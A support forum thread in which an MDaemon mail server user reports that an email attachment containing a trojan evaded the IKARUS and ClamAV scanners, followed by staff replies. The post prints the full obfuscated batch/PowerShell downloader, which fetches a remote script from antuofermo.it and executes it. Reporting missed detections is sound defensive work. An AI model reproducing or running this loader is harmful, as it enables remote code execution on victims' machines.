Virus not detected by either Ikarus or Clam
-
Hi,
I am running the latest version of MDaemon and the Antivirus plugin. Today an email with a disk image attachment (.img file) containing a batch file (PowerShell/TrojanDownloader.Agent trojan) was passed through without being blocked. Fortunately the ESET antivirus on the client's endpoint detected it.
Here is the MDaemon antivirus log:
Mon 2024-02-19 07:43:40.120: * IKARUS AV: clean (0.020 s) doc20241902070611.img (C:\MDaemon\CFilter\TEMP\3141324088\pd82059750.att)
Mon 2024-02-19 07:43:40.764: * ClamAV: clean (0.643 s) doc20241902070611.img (C:\MDaemon\CFilter\TEMP\3141324088\pd82059750.att)
and here is the batch file hidden in the attachment:
@echo off
set rt0=pAoAwAeArAsAhAeAlAl
set rt0=%rt0:A=%
Set message=$rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType
set message2=], 3072);[System.Net.ServicePointManager]::SecurityProto
set message3=col = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thParti
set message4=alName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
set message5=$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tt
set message6=y;$rot='Down','load','str','ing';$rotJ=($rot -join '');$bnt='https','://antuofermo.it/G12.txt';$bng0=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bng0);z($mv)
start /min %rt0% %message%%message2%%message3%%message4%%message5%%message6%
-
Arron Staff
Please put the original MSG file in a password protected zip file and email it to virusfn@mdaemon.com. Please be sure to include the password in your email.
-
"This malware has been classified as a virus since yesterday and is detected accordingly."
----------------------------------
IKARUS Security Software GmbH
Blechturmgasse 11, A-1050 Wien
Web: https://www.ikarussecurity.com
----------------------------------
-
Arron Staff
Thank you for letting us know!